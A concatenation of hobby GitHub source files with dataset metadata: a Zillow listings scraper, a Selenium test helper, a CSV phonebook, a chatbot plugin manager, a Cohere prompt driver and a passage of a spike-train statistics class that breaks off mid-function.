get_zillow_region_id(state, city)\n print('zillow region id: ' + region_id)\n\n listings = get_zillow_listings_for_region(region_id)\n print('zillow listings in region found: ' + str(len(listings)))\n\n filename = write_listings_to_file(listings, state, city, region_id)\n print('output file: ' + filename)\n\ndef get_zillow_region_id(state, city):\n response = requests.get(\n 'https://www.zillow.com/webservice/GetRegionChildren.htm',\n params={\n 'zws-id': 'X1-ZWz1hkkltuo8wb_8tgid',\n 'city': city,\n 'state': state\n }\n )\n\n # it's fucking xml?!\n return ElementTree.fromstring(response.content).find('response').find('region').find('id').text\n\ndef get_zillow_listings_for_region(region_id):\n page = 1\n data = fetch_zillow_listings(region_id, page)\n total_result_count = data['cat1']['searchList']['totalResultCount']\n listings = data['cat1']['searchResults']['listResults']\n\n while total_result_count > 0:\n page += 1\n data = fetch_zillow_listings(region_id, page)\n listings += data['cat1']['searchResults']['listResults']\n total_result_count = data['cat1']['searchList']['totalResultCount']\n\n return list({v['zpid']:v for v in listings}.values())\n\ndef fetch_zillow_listings(region_id, page = 1):\n url = f\"https://www.zillow.com/search/GetSearchPageState.htm?{build_search_query(region_id, page)}\"\n print(url)\n response = requests.get(\n url,\n headers={\n 'user-agent': 'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.2; Trident/5.1)',\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.9',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'sec-gpc': '1',\n 'sec-fetch-site': 'none'\n }\n )\n\n if (response.status_code != 200):\n print('failed to obtain listings from zillow:')\n print(response.content)\n sys.exit(2)\n\n return response.json()\n\ndef build_search_query(region_id, page):\n min = 500000\n max = 2000000\n\n # need to url encode a json string so it can be used as a query param\n # lat/lng is required and is hard coded to cover continental usa to allow any american city\n # price range hard coded to 500k-2m\n return urllib.parse.urlencode(\n {\n 'searchQueryState': {\n \"pagination\": {\"currentPage\": page},\n \"mapBounds\": {\n \"west\": -124.848974,\n \"east\": -66.885444,\n \"south\": 24.396308,\n \"north\": 49.384358\n },\n \"regionSelection\": [{\"regionId\": region_id, \"regionType\": 6}],\n \"isMapVisible\": False,\n \"filterState\": {\n \"beds\": {\"min\": 2}, \"baths\":{\"min\": 2},\n \"isMultiFamily\": {\"value\":False}, \"isApartmentOrCondo\": {\"value\":False}, \"isApartment\": {\"value\":False}, \"isCondo\": {\"value\":False},\n \"isLotLand\": {\"value\": False}, \"isManufactured\": {\"value\":False},\n \"price\": {\"min\": min, \"max\": max}\n # \"doz\": {\"value\": \"6m\"}, \"isForSaleByAgent\": {\"value\": False},\n # \"isForSaleByOwner\": {\"value\": False}, \"isNewConstruction\": {\"value\": False},\n # \"isForSaleForeclosure\": {\"value\": False}, \"isComingSoon\": {\"value\": False},\n # \"isAuction\": {\"value\": False}, \"isPreMarketForeclosure\": {\"value\": False},\n # \"isPreMarketPreForeclosure\": {\"value\": False},\n # \"isRecentlySold\": {\"value\": True}, \"isAllHomes\": {\"value\": True},\n # \"hasPool\": {\"value\": True}, \"hasAirConditioning\": {\"value\": True},\n # \"isApartmentOrCondo\": {\"value\": False},\n },\n \"isListVisible\": True\n },\n 'wants': {\"cat1\": [\"listResults\"], \"cat2\": [\"total\"]},\n 'requestId': page\n }\n )\n # \"{\\\"pagination\\\":{\\\"currentPage\\\":%i},\\\"mapBounds\\\":{\\\"west\\\":-124.848974,\\\"east\\\":-66.885444,\\\"south\\\":24.396308,\\\"north\\\":49.384358},\\\"regionSelection\\\":[{\\\"regionId\\\":%s,\\\"regionType\\\":6}],\\\"isMapVisible\\\":false,\\\"filterState\\\":{\\\"price\\\":{\\\"min\\\":50000,\\\"max\\\":200000}},\\\"isListVisible\\\":true}\"%(page, region_id)\n\ndef write_listings_to_file(listings, state, city, region_id):\n # flatten the data so it can be stored as a csv\n flattened_listings = list(map(transform_listing, listings))\n filename = 'datasets/%s_%s_%s.csv'%(city, state, region_id)\n keys = flattened_listings[0].keys()\n with open(filename, 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(flattened_listings)\n \n return filename\n\ndef transform_listing(listing):\n # additional_data = fetch_additional_data(listing)\n # print(additional_data)\n homeInfo = listing['hdpData']['homeInfo']\n return {\n 'address': listing['address'],\n 'zipcode': homeInfo.get('zipcode', None),\n 'type': homeInfo.get('homeType', None),\n 'status': homeInfo.get('homeStatus', None),\n 'other_status': listing['statusText'],\n 'price': homeInfo.get('price', None),\n # 'last_sold_price': additional_data.get('lastSoldPrice', None),\n # 'tax_assessed_value': additional_data.get('taxAssessedValue', None),\n # 'tax_assessed_year': additional_data.get('taxAssessedYear', None),\n # 'mortgage_rate': additional_data['mortgageRates'].get('thirtyYearFixedRate', None),\n # 'propert_tax_rate': additional_data.get('propertyTaxRate', None),\n 'zestimate': homeInfo.get('zestimate', None),\n 'festimate': homeInfo.get('festimate', None),\n 'rent_zestimate': homeInfo.get('rentZestimate', None),\n 'beds': listing['beds'],\n 'baths': listing['baths'],\n 'area': listing['area'],\n 'year': homeInfo.get('yearBuilt', None),\n 'price_reduction': homeInfo.get('priceReduction', None),\n 'price_increase': homeInfo.get('priceChange', None),\n 'days_on_zillow': homeInfo.get('daysOnZillow', None),\n 'extra_info': listing['variableData']['text'],\n 'extra_info_type': listing['variableData']['type'],\n 'zpid': listing['zpid'],\n 'id': listing['id'],\n 'link': listing['detailUrl']\n }\n\ndef fetch_additional_data(listing):\n response = requests.post(\n 'https://www.zillow.com/graphql/',\n params={\n 'zpid': listing['zpid'],\n 'queryId': '4f7d72d05b119ce8d8cc87dc6f5c6cc2',\n 'operationName': 'ForSaleDoubleScrollFullRenderQuery'\n },\n headers={\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',\n 'origin': 'https://www.zillow.com',\n 'referer': listing['detailUrl'],\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.9'\n },\n json={\n \"operationName\": \"ForSaleDoubleScrollFullRenderQuery\",\n \"variables\": {\n \"zpid\": listing['zpid'],\n \"contactFormRenderParameter\": {\n \"zpid\":listing['zpid'],\n \"platform\": \"desktop\",\n \"isDoubleScroll\": 'true'\n }\n },\n \"clientVersion\": \"home-details/5.49.24.2.master.ee287a1\",\n \"queryId\":\"4f7d72d05b119ce8d8cc87dc6f5c6cc2\"\n }\n )\n\n print(response.url)\n if (response.status_code != 200):\n print('failed to obtain additional data for ' + listing['zpid'] + ':')\n print(response.content)\n return {}\n\n data = response.json()['data']['property']\n time.sleep(1)\n\n return {\n 'lastSoldPrice': data['lastSoldPrice'],\n 'taxAssessedValue': data['taxAssessedValue'],\n 'taxAssessedYear': data['taxAssessedYear'],\n 'mortgageRates': data.get('mortgageRates', { 'thirtyYearFixedRate': None }),\n 'propertyTaxRate': data['propertyTaxRate'],\n }\n\ndef parse_args(argv):\n try:\n opts, args = getopt.getopt(argv,'hs:c:',['state=','city='])\n except getopt.GetoptError:\n print('get_zillow_listings.py -s -c ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('get_zillow_listings.py -s -c ')\n sys.exit()\n elif opt in ('-s', '--state'):\n state = arg\n elif opt in ('-c', '--city'):\n city = arg\n\n try:\n state, city\n except NameError:\n print('both state and city are required')\n print('get_zillow_listings.py -s -c ')\n sys.exit(2)\n return state, city\n\nif __name__ == '__main__':\n main(sys.argv[1:])","repo_name":"hankedori/real-estate","sub_path":"script/get_zillow_listings.py","file_name":"get_zillow_listings.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20545682721","text":"from time import sleep\n\nfrom selenium.webdriver.common.by import By\n\nfrom base.base import Base\n\n\nclass WebBase(Base):\n \"\"\"以下为web项目专属方法\"\"\"\n # 根据显示的文本点击指定的元素\n def web_base_click_element(self,placeholder_text,click_text):\n # 1.点击父选框\n loc = By.CSS_SELECTOR, \" [placeholder = '{}'] \".format(placeholder_text)\n self.base_click(loc)\n # 暂停\n sleep(1)\n # 点击包含显示文本的元素\n loc = By.XPATH, \"//*[text()='{}']\".format(click_text)\n self.base_click(loc)\n","repo_name":"2761594771/uiAutoTestHmtt3","sub_path":"base/web_base.py","file_name":"web_base.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40282710366","text":"import csv\nimport sys\nimport datetime\n\n# create contact list\n\n\ndef AddContact():\n name = input(\"name: \").strip()\n number = int(input(\"phonenumber: \").strip())\n email = input(\"email: \").strip()\n address = input(\"address: \").strip()\n\n # store input in a dictionary format\n contactInfor = dict(name=name, number=number, email=email,\n address=address, date_created=datetime.date.today())\n\n # then store that same information in a csv file.\n with open('phonedata.csv', 'a', newline='') as contact:\n fieldnames = ['name', 'number', 'email', 'address', 'date_created']\n writer = csv.DictWriter(contact, fieldnames=fieldnames)\n writer.writerow(contactInfor)\n\n # Avoid reruning the script, ask users if they would like to add another contact:\n add_query = input(\"Do you want to search something else? Y/N: \")\n if add_query == 'Y':\n add = AddContact()\n elif add_query == 'N':\n print((\"*\")*20, end=None)\n print(\"You are logged out\")\n print((\"*\")*20, end=None)\n print(\"Thank you for using our service\")\n sys.exit()\n return add\n\n# Searching for contact: by name, number, email, address or date\n# Linear search\n\n\ndef ContactSearch():\n # Open the csv file containing list of contacts:\n with open('phonedata.csv', newline='') as file:\n # convert the csv into readerable dict\n reader = list(csv.DictReader(file))\n q = input(\"Enter name or Number: \") # search query :\n for i in range(0, len(reader)):\n if q in reader[i].values(): # q can be name, number, email, address\n print((\"#\")*20, \"Printing Results\", (\"#\")*20, end=None)\n # return items where the query matched.\n result = reader[i].items()\n print(result)\n print((\"#\")*20, \"done Printing\", (\"#\")*20, end=None)\n break\n # Avoid printing not found anytime q is not found in reader[i].\n if q not in reader[i].values():\n # Until the program loops through the whole dict, then print the not found\n continue\n else:\n print((\"#\")*20, end=None)\n print(\"Please the contact can't be found!!\")\n print((\"#\")*20, end=None)\n\n # asking for more actions\n search_query = input(\"Do you want to search something else? Y/N: \")\n if search_query == 'Y':\n search = ContactSearch()\n elif search_query == 'N':\n\n print((\"*\")*20, end=None)\n\n search = \"logging you out\"\n print(search + \"done\")\n print((\"*\")*20, end=None)\n print(\"Thank you for using our services\")\n sys.exit()\n return search\n\ndef contactdelete():\n lines = list()\n members = input(\"Please enter a number to be deleted\")\n with open('phonedata.csv', newline='') as delfile:\n reader = csv.reader(delfile)\n for row in reader:\n lines.append(row)\n for field in row:\n if field == members:\n lines.remove(row)\n\n # Updating the CSV file.\n with open(\"phonebook.csv\", 'w', newline=\"\") as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(lines)\n print(\"deleted, Thank you\")\n print(lines)\n sys.exit()\n\n\ndef welcome():\n question = input(\n \"How can I help? C: create contact, S: for search, D: for delete. \")\n if question == \"C\":\n follow = AddContact()\n elif question == \"S\":\n follow = ContactSearch()\n elif question == \"D\":\n follow = contactdelete()\n return follow\n\n\nwelcome()\n","repo_name":"gilbertekalea/phonebook","sub_path":"phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16342592583","text":"\"\"\"\n@Author: Kasugano Sora\n@Github: https://github.com/jiangyuxiaoxiao\n@Date: 2023/6/30-23:35\n@Desc: \n@Ver : 1.0.0\n\"\"\"\nimport json\nimport aiofiles\nimport os\nfrom nonebot import get_loaded_plugins\nfrom Hiyori.Utils.File import JsonFileExist, DirExist\n\n\nclass pluginsManager:\n GroupPluginInfo: dict[str, dict[str, bool]] = dict()\n UserPluginInfo: dict[str, dict[str, bool]] = dict()\n GroupJsonPath: str = \"./Config/Plugin_Manager/groupConfig.json\"\n UserJsonPath: str = \"./Config/Plugin_Manager/userConfig.json\"\n\n # 初始化\n @staticmethod\n def LoadConfig():\n \"\"\"初始化,从json文件加载配置\"\"\"\n DirExist(os.path.dirname(pluginsManager.GroupJsonPath))\n JsonFileExist(pluginsManager.GroupJsonPath)\n JsonFileExist(pluginsManager.UserJsonPath)\n pluginsManager.GroupPluginInfo.clear()\n pluginsManager.UserPluginInfo.clear()\n # 加载群插件配置\n with open(pluginsManager.GroupJsonPath, encoding=\"utf-8\", mode=\"r\") as file:\n info = file.read()\n pluginsManager.GroupPluginInfo = json.loads(info)\n # 加载用户插件配置\n with open(pluginsManager.UserJsonPath, encoding=\"utf-8\", mode=\"r\") as file:\n info = file.read()\n pluginsManager.UserPluginInfo = json.loads(info)\n\n # 保存群组配置\n @staticmethod\n async def SaveGroupConfig():\n \"\"\"保存群组配置\"\"\"\n async with aiofiles.open(pluginsManager.GroupJsonPath, encoding=\"utf-8\", mode=\"w\") as file:\n info = json.dumps(pluginsManager.GroupPluginInfo, indent=2, ensure_ascii=False)\n await file.write(info)\n\n # 保存个人配置\n @staticmethod\n async def SaveUserConfig():\n \"\"\"保存个人配置\"\"\"\n async with aiofiles.open(pluginsManager.UserJsonPath, encoding=\"utf-8\", mode=\"w\") as file:\n info = json.dumps(pluginsManager.UserPluginInfo, indent=2, ensure_ascii=False)\n await file.write(info)\n\n # 判断群组的对应插件是否开启,若开启返回True,否则返回False\n @staticmethod\n def GroupPluginIsOn(GroupID: str, PluginName: str) -> bool:\n \"\"\"判断群组的对应插件是否开启,若开启返回True,否则返回False\"\"\"\n # 检查插件是否常驻\n if pluginsManager.PluginKeepOn(PluginName):\n return True\n if GroupID in pluginsManager.GroupPluginInfo.keys():\n GroupInfo = pluginsManager.GroupPluginInfo[GroupID]\n # 检查是否开启白名单模式\n if \"WhiteList\" in GroupInfo.keys():\n # 若开启了白名单模式\n if GroupInfo[\"WhiteList\"]:\n if PluginName in GroupInfo.keys():\n return GroupInfo[PluginName]\n else:\n return False\n # 未开启白名单模式\n if PluginName in GroupInfo.keys():\n return GroupInfo[PluginName]\n return True\n\n # 判断用户的对应插件是否开启,若开启返回True,否则返回False\n @staticmethod\n def UserPluginIsOn(QQ: str, PluginName: str) -> bool:\n \"\"\"判断用户的对应插件是否开启,若开启返回True,否则返回False\"\"\"\n # 检查插件是否常驻\n if pluginsManager.PluginKeepOn(PluginName):\n return True\n if QQ in pluginsManager.UserPluginInfo.keys():\n UserInfo = pluginsManager.UserPluginInfo[QQ]\n # 检查是否开启白名单模式\n if \"WhiteList\" in UserInfo.keys():\n # 若开启了白���单模式\n if UserInfo[\"WhiteList\"]:\n if PluginName in UserInfo.keys():\n return UserInfo[PluginName]\n else:\n return False\n # 未开启白名单模式\n if PluginName in UserInfo.keys():\n return UserInfo[PluginName]\n return True\n\n # 更改群组插件状态\n @staticmethod\n async def ChangeGroupPluginStatus(GroupID: str, PluginName: str, status: bool):\n if GroupID not in pluginsManager.GroupPluginInfo:\n pluginsManager.GroupPluginInfo[GroupID] = dict()\n pluginsManager.GroupPluginInfo[GroupID][PluginName] = status\n await pluginsManager.SaveGroupConfig()\n\n # 改变个人插件状态\n @staticmethod\n async def ChangeUserPluginStatus(QQ: str, PluginName: str, status: bool):\n if QQ not in pluginsManager.UserPluginInfo:\n pluginsManager.UserPluginInfo[QQ] = dict()\n pluginsManager.UserPluginInfo[QQ][PluginName] = status\n await pluginsManager.SaveUserConfig()\n\n # 获取在黑名单模式下,群组已关闭插件列表\n @staticmethod\n def GetGroupOffPlugins(GroupID: str) -> list[str]:\n \"\"\"\n 获取在黑名单模式下,群组已关闭插件列表\n\n :param GroupID: 群号\n :return: 已关闭的插件的列表【黑名单模式下】\n \"\"\"\n result = []\n if GroupID not in pluginsManager.GroupPluginInfo.keys():\n return result\n else:\n groupInfo = pluginsManager.GroupPluginInfo[GroupID]\n if len(groupInfo) != 0:\n for pluginName, status in groupInfo.items():\n if not status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 获取在白名单模式下,群组已开启插件列表\n @staticmethod\n def GetGroupOnPlugins(GroupID: str) -> list[str]:\n \"\"\"\n 获取在白名单模式下,群组已开启插件列表\n\n :param GroupID: 群号\n :return: 已开启的插件的列表【白名单模式下】\n \"\"\"\n result = []\n if GroupID not in pluginsManager.GroupPluginInfo.keys():\n return result\n else:\n groupInfo = pluginsManager.GroupPluginInfo[GroupID]\n if len(groupInfo) != 0:\n for pluginName, status in groupInfo.items():\n if status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 获取在黑名单模式下,个人已关闭插件列表\n @staticmethod\n def GetUserOffPlugins(QQ: str) -> list[str]:\n \"\"\"\n 获取在黑名单模式下,个人已关闭插件列表\n\n :param QQ: QQ号\n :return: 已关闭的插件的列表【黑名单模式下】\n \"\"\"\n result = []\n if QQ not in pluginsManager.UserPluginInfo.keys():\n return result\n else:\n userInfo = pluginsManager.UserPluginInfo[QQ]\n for pluginName, status in userInfo.items():\n if not status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 获取在黑名单模式下,个人已关闭插件列表\n @staticmethod\n def GetUserOnPlugins(QQ: str) -> list[str]:\n \"\"\"\n 获取在黑名单模式下,个人已关闭插件列表\n\n :param QQ: QQ号\n :return: 已开启的插件的列表【白名单模式下】\n \"\"\"\n result = []\n if QQ not in pluginsManager.UserPluginInfo.keys():\n return result\n else:\n userInfo = pluginsManager.UserPluginInfo[QQ]\n for pluginName, status in userInfo.items():\n if status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 检查群组是否是白名单模式\n @staticmethod\n def GroupWhiteListStatus(GroupID: str) -> bool:\n \"\"\"\n 检查群组是否是白名单模式,若是则返回True\n\n :param GroupID: 群号\n :return: 是否是白名单模式\n \"\"\"\n # 默认为黑名单模式\n if GroupID not in pluginsManager.GroupPluginInfo.keys():\n return False\n else:\n groupInfo = pluginsManager.GroupPluginInfo[GroupID]\n if \"WhiteList\" not in groupInfo.keys():\n return False\n else:\n return groupInfo[\"WhiteList\"]\n\n # 检查用户是否是白名单模式\n @staticmethod\n def UserWhiteListStatus(QQ: str) -> bool:\n \"\"\"\n 检查用户是否是白名单模式,若是则返回True\n\n :param QQ: QQ号\n :return: 是否是白名单模式\n \"\"\"\n # 默认为黑名单模式\n if QQ not in pluginsManager.UserPluginInfo.keys():\n return False\n else:\n userInfo = pluginsManager.UserPluginInfo[QQ]\n if \"WhiteList\" not in userInfo.keys():\n return False\n else:\n return userInfo[\"WhiteList\"]\n\n # 检查插件是否常驻\n @staticmethod\n def PluginKeepOn(PluginName: str) -> bool:\n \"\"\"\n 检查插件是否常驻\n\n :param PluginName: 插件名\n :return: 若插件常驻则返回True,否则返回False\n \"\"\"\n plugins = get_loaded_plugins()\n for plugin in plugins:\n if hasattr(plugin.metadata, \"name\"):\n if plugin.metadata.name == PluginName:\n if hasattr(plugin.metadata, \"extra\"):\n extraInfo = plugin.metadata.extra\n if \"Keep_On\" in extraInfo.keys():\n return extraInfo[\"Keep_On\"]\n return False\n return False\n","repo_name":"jiangyuxiaoxiao/Hiyori","sub_path":"Hiyori/Plugins/Basic_plugins/Plugin_Manager/pluginManager.py","file_name":"pluginManager.py","file_ext":"py","file_size_in_byte":9507,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} +{"seq_id":"74838827272","text":"import Poly\nimport Mat\nimport pdb\n\n#Convert a polynomial with matrix coefficients to a matrix with\n#polynomial entries\ndef polyMatToMatPoly(Ms,field):\n ring=Poly.Poly(field)\n m=Ms[0].m\n n=Ms[0].n\n A=Mat.Mat(ring,m,n)\n for k in xrange(len(Ms)):\n for i in xrange(m):\n for j in xrange(n):\n d=A.getElt(i,j)\n d=ring.timesXPower(d,1)\n e=ring.fromScalar(Ms[k].getElt(i,j))\n d=ring.add(d,e)\n A.setElt(i,j,d)\n return A\n","repo_name":"alexstachnik/block-wiedemann-example","sub_path":"PolyAlg.py","file_name":"PolyAlg.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"4621886090","text":"import cohere\nfrom attr import define, field, Factory\nfrom griptape.artifacts import TextArtifact\nfrom griptape.drivers import BasePromptDriver\nfrom griptape.tokenizers import CohereTokenizer\nfrom griptape.utils import PromptStack\n\n\n@define\nclass CoherePromptDriver(BasePromptDriver):\n \"\"\"\n Attributes: \n api_key: Cohere API key.\n model: \tCohere model name. Defaults to `xlarge`.\n client: Custom `cohere.Client`.\n tokenizer: Custom `CohereTokenizer`.\n \"\"\"\n api_key: str = field(kw_only=True)\n model: str = field(default=CohereTokenizer.DEFAULT_MODEL, kw_only=True)\n client: cohere.Client = field(\n default=Factory(lambda self: cohere.Client(self.api_key), takes_self=True), kw_only=True\n )\n tokenizer: CohereTokenizer = field(\n default=Factory(lambda self: CohereTokenizer(model=self.model, client=self.client), takes_self=True),\n kw_only=True\n )\n\n def try_run(self, prompt_stack: PromptStack) -> TextArtifact:\n prompt = self.prompt_stack_to_string(prompt_stack)\n result = self.client.generate(\n prompt=prompt,\n model=self.model,\n temperature=self.temperature,\n end_sequences=self.tokenizer.stop_sequences,\n max_tokens=self.max_output_tokens(prompt)\n )\n\n if len(result.generations) == 1:\n generation = result.generations[0]\n\n return TextArtifact(\n value=generation.text.strip()\n )\n else:\n raise Exception(\"Completion with more than one choice is not supported yet.\")\n","repo_name":"griptape-ai/griptape","sub_path":"griptape/drivers/prompt/cohere_prompt_driver.py","file_name":"cohere_prompt_driver.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1275,"dataset":"github-code","pt":"27"} +{"seq_id":"36688794859","text":"import xml.etree.ElementTree as ET\r\nfrom xml.etree.ElementTree import Element\r\nfrom node import node_factory\r\nfrom node.node import Node\r\n\r\nnodes = []\r\n\r\n\r\ndef load(file):\r\n data = ET.parse(file)\r\n root: Element = data.getroot()\r\n xml_nodes = root.findall(\"node\")\r\n\r\n for xml_node in xml_nodes:\r\n nodes.append(node_factory.get_node(xml_node))\r\n\r\n\r\ndef get_node_by_id(index: int) -> Node:\r\n for node in nodes:\r\n if node.node_index == index:\r\n return node\r\n return None","repo_name":"pxtree/DreamsBot","sub_path":"scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29328567504","text":"import numpy as np\nfrom brian2 import *\n\nclass Spike_Stats:\n '''\n Description: Given spike times of each neuron, statistical parameters of ISI(Inter-Spike-Interval) can be calculated\n like mean, variance, co-efficent of variation. Spike trains can also be compared to produce correlation\n coefficients\n\n Parameters:\n '''\n\n def __init__(self): # Not sure what to do here yet\n pass\n\n def ISI_stats(self, spikemon):\n neuron_spikes = spikemon.spike_trains() # Dictionary with dict keys as neuron indices and\n # dict values as an array of spike times for that neuron\n firing_n = list(set(sort(spikemon.i))) # To create a set or list of all unique neuron indices that have spiked\n # in order to calculate statistical parameters for each unique neuron\n\n ISI = {} # Create an empty dictionary to contain dict keys as neuron indices and dict values as an array of ISIs\n ISI_mean = {} # Dict for ISI mean of each neuron index\n ISI_var = {} # Dict for ISI variance of each neuron index\n ISI_cv = {} # Dict for ISI co-efficient of variation (CV) for each neuron index\n\n # Calculate variance and mean of each ISI (Inter-Spike-Interval)\n for i in firing_n:\n # Calculate ISI array by subtracting spike times of each neuron to get an array of spike intervals\n ISI[i] = np.diff(neuron_spikes[i])\n # Calculate mean of ISI\n ISI_mean[i] = np.mean(ISI[i])\n # Calculate variance of ISI\n ISI_var[i] = np.var(ISI[i])\n # Calculate co-efficient of variation(CV) of ISI\n ISI_cv[i] = np.sqrt(ISI_var[i]) / ISI_mean[i]\n return ISI, ISI_mean, ISI_var, ISI_cv\n\n def spk_extract(self, spikemon, tstart, tend):\n '''\n This function splits up spike monitors into desired time intervals and outputs:\n - a dictionary of neuron indices with their corresponding spike times within the specified interval\n - an array of spike times generated within the time interval for the entire network irrespective of neuron indices\n - an array of neuron indices corresponding to spike times\n '''\n SN_t = []\n SN_i = []\n SN_mon = {}\n\n for neuron in arange(n):\n temp_time = [j for j in spikemon.spike_trains()[neuron] if j > tstart * ms and j <= tend * ms]\n SN_t.extend(temp_time[:])\n SN_mon[neuron] = temp_time\n SN_t = sort(SN_t)\n\n # This for loop is to return an array of neuron indices corresponding to spikes times. Identical to any\n # spikemonitor.i output\n for t in SN_t:\n for index in SN_mon.keys(): # iterating through neuron indices' spike trains\n for spike in SN_mon[index]: # iterating through values in spike trains\n if t == spike / ms:\n SN_i.append(index)\n flag = 1\n break\n else:\n flag = 0\n if flag == 1:\n break\n\n return SN_mon, SN_t, SN_i\n\n def spikebin_indv(self, sp_time, tstart, tend):\n '''\n This function takes in an array of spike times and counts the number of spikes occuring within a time interval\n defined by bin_size.\n It outputs an array of 0's and 1's to indicate whether or not a spike occured within an interval:\n - for each neuron (sp_ibinary)\n - bins: [t0,t0 + bin_size), [t1,t1 + bin_size).....\n '''\n\n sp_ibinary = {}\n t_interval = arange(tstart, tend, bin_size) # bin_size is a global parameter defined in the input section\n t_size = len(t_interval) + 1\n\n for k in range(0, len(sp_time)):\n temp = np.array([0] * t_size) # Converting to an array so that simulatenous assignment\n # to multiple indices is possible\n if sp_time[k] != []:\n bin_pos = ((sp_time[k] / (bin_size * ms)) - tstart / bin_size).astype(int)\n temp[bin_pos] = 1\n sp_ibinary[k] = temp\n\n return sp_ibinary\n\n def spikebin_total(self, sp_time, tstart, tend,bin_size):\n '''\n This function takes in an array of spike times and counts the number of spikes occuring within a time interval\n defined by bin_size.\n It outputs an array of the number of times a spike occured within an interval normalized by bin size:\n - for the overall network (sp_tbinary)\n - bins: [t0,t0 + bin_size), [t1,t1 + bin_size).....\n '''\n # Calculating binary spike train for the overall network\n t_interval = np.arange(tstart, tend, bin_size) # bin_size is a global parameter defined in the input section\n t_size = len(t_interval) + 1\n\n sp_tbinary = np.array([0] * t_size) # empty array to store the binary spike train\n sp_time_phase = [j for j in sp_time if\n j > tstart * ms and j <= tend * ms] # removes spike times above or below the\n # desired time interval\n for k in sp_time_phase:\n bin_pos = int((k / (bin_size * ms)) - tstart / bin_size)\n sp_tbinary[bin_pos] = 1 + sp_tbinary[bin_pos]\n\n sp_tbinary = sp_tbinary / bin_size\n\n return sp_tbinary\n\n def spike_cc(self, set1, set2):\n '''\n This function calculates Pearson product-moment correlation co-efficients of individual neuron spike trains\n '''\n # set1 = SN1_2_binary\n # set2 = SN2_2_binary\n final_CC = np.zeros((n, n))\n\n for i in set1:\n val1 = set1[i]\n for j in set2:\n val2 = set2[j]\n corr = np.corrcoef(val1, val2)\n final_CC[i][j] = corr[0, 1]\n return final_CC\n\n def spike_tcc(self, set1, set2):\n '''\n This function calculates Pearson product-moment correlation co-efficients by comparing\n spike trains of the total network (used for batch simulation)\n\n NOTE: Pearson product-moment correlation co-efficients is undefined for a constant time series like [1,1,1]\n because the variance/std is zero\n https://en.wikipedia.org/wiki/Pearson_correlation_coefficient\n '''\n if all(set1 == [1] * len(set1)) and all(\n set2 == [1] * len(set2)): # Check if all elements in both binary spike trains\n # are all 1s (if so Pearson method is undefined)\n corr = array([[1, 1], [1, 1]]) # set a value of 1 to show both spike trains are the same\n else:\n corr = np.corrcoef(set1, set2)\n\n return corr[0, 1]\n\n def batch_cc(self, SN1_2t, SN2_2t,phase1,phase2,bin_size):\n SN1_2_tbin = self.spikebin_total(SN1_2t, phase1, phase2,bin_size)\n SN2_2_tbin = self.spikebin_total(SN2_2t, phase1, phase2,bin_size)\n SN_2_tCC = self.spike_tcc(SN1_2_tbin, SN2_2_tbin)\n return SN_2_tCC\n\n # older func. Made newer one to cut down on unnecessary data\n def batch_cc_old(self, SN1, SN2):\n '''\n This function can be called each time a simulation is run to generate statistics of spike trains for each network\n and for each neuron within the networks\n\n SN0 is a spike monitor recording all spikes occuring in all neurons within a network\n SN0_all is a dictionary with spike times for corresponding neuron indices within the specified time period\n SN0_allt is an array of all spike times generated by the network within the time period\n SN0_ibin is a dictionary of binary spike trains corresponding to each neuron in the network\n SN0_tbin is the binary spike train of the network as a whole\n SN0_iCC is a matrix of correlation co-efficients generated by comparing all neurons in one network to another (N by N)\n SN0_tCC is a single number between -1 and 1 indicating how similar the overall binary spike train of one network is\n compared to the other\n '''\n # Extract spike times and corresponding neuron indices for each phase\n # Get a dictionary of neuron indices and corresponding spike times for each phase(1,2 or 3)\n # Get an array of overall network spike times for each phase, this will be used as input for PySpike functions\n\n # [SN0_all,SN0_allt] = stats.spk_extract(SN0,0,run_time)\n\n [SN1_1, SN1_1t, _] = self.spk_extract(SN1, 0, phase1)\n [SN2_1, SN2_1t, _] = self.spk_extract(SN2, 0, phase1)\n\n [SN1_2, SN1_2t, _] = self.spk_extract(SN1, phase1, phase2)\n [SN2_2, SN2_2t, _] = self.spk_extract(SN2, phase1, phase2)\n\n [SN1_3, SN1_3t, _] = self.spk_extract(SN1, phase2, phase3)\n [SN2_3, SN2_3t, _] = self.spk_extract(SN2, phase2, phase3)\n\n ##############################################################################\n # Create binary spike trains, put into stats class\n\n '''# Stand-alone network 1\n SN0_ibin = stats.spikebin_indv(SN0_all,0,run_time)\n SN0_tbin = stats.spikebin_total(SN0_allt,0,run_time)\n SN0_iCC = stats.spike_cc(SN0_ibin,SN0_ibin)\n SN0_tCC = stats.spike_tcc(SN0_tbin,SN0_tbin)'''\n\n # First phase of uncoupled networks\n # 